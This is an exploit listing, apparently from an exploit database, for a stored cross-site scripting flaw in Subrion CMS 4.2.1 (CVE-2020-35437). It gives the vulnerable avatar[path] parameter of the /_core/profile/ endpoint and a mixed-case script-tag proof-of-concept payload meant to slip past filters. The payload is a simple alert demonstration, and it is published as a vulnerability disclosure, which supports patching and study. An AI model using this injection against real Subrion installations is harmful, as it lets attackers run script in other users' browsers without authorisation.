Exploit for Subrion CMS 4.2.1 Cross Site Scripting CVE-2020-35437

Name: Exploit for Subrion CMS 4.2.1 Cross Site Scripting CVE-2020-35437
Rating: 5 (199 reviews)

2021-01-05 | CVSS 4.3

## https://sploitus.com/exploit?id=PACKETSTORM:160783
# Exploit Title: Subrion CMS 4.2.1 - 'avatar[path]' XSS  
# Date: 2020-12-15  
# Exploit Author: icekam  
# Vendor Homepage: https://subrion.org/ <https://www.icekam.com/>  
# Software Link: https://github.com/intelliants/subrion  
# Version: Subrion CMS 4.2.1  
# CVE : CVE-2020-35437  
  
stored xss vulnerability in /_core/profile/.  
Reproduce through the avatar[path] parameter in post /_core/profile/ url.  
payload:"><sCrIpT>alert(1)</sCrIpT>  
  
https://github.com/intelliants/subrion/issues/880